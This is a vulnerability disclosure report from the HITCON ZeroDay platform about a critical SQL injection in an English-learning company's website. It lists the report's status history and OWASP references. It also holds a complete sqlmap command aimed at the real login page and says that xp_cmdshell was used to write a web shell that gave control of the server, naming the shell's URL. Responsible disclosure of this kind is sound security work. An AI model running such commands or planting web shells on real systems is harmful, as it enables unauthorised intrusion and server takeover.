Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2017-00434
- Vendor: 空中美語文教事業股份有限公司
- Title: 空中美語SQL Injection Vulnerability
- Introduction: SQLi,GetShell
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2017/05/29 15:04:21 : 新提交 (由 Hzllaga 更新此狀態)
- 2017/05/29 15:29:25 : 新提交 (由 Hzllaga 更新此狀態)
- 2017/05/29 18:40:05 : 審核完成 (由 HITCON ZeroDay 平台自動更新)
- 2017/05/29 20:41:33 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/05/29 20:41:34 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/06/01 04:31:43 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/06/01 11:43:47 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/06/01 14:15:50 : 確認已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/06/05 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2017-00434
- 通報者:haihai (Hzllaga)
- 風險:嚴重
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
sqlmap.py -u "https://www.english4u.net/web/download/login.aspx" --data "EVENTTARGET=&EVENTARGUMENT=&VIEWSTATE=%2FwEPDwUKMTA3NDE3MzM3Mw9kFgJmD2QWAgIDD2QWAgIDDw9kDxAWAmYCARYCFgIeDlBhcmFtZXRlclZhbHVlZBYCHwBkFgICBQIDZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFGGN0bDAwJExvZ2luU3RhdHVzMSRjdGwwMQUYY3RsMDAkTG9naW5TdGF0dXMxJGN0bDAzz1HtjaNony%2ForRgbZazQTfWZL7I%3D&VIEWSTATEGENERATOR=6C8468D8&__EVENTVALIDATION=%2FwEdAAdFuDR6NmE%2BIGtnVg9bWuR3yhlHDN25acBMNcp5pxKYrjunnhk4GnfJLKoQ630ZfMGVeG6rrLts0M7XT7lmdcb6WO8bQVCGenMNoUqXUssZTzIGfeNLpuJYVxuJmBjVpKkA4o%2BsMmbxkqN%2FaEqi2ZRqxzEe2vnGFU%2BhOqr3JjQJYgFQkGY%3D&ctl00$ContentPlaceHolder1$LoginButton=88952634&ctl00$ContentPlaceHolder1$Password1=88952634&ctl00$ContentPlaceHolder1$Password2=88952634&ctl00$ContentPlaceHolder1$Password3=88952634&ctl00$ContentPlaceHolder1$UserName=88952634*" --batch --random-agent
多個參數存在漏洞. 當前用戶:sa 使用xp_cmdshell命令寫入木馬 可操控伺服器.
http://www.english4u.net/web/download/haihai.asp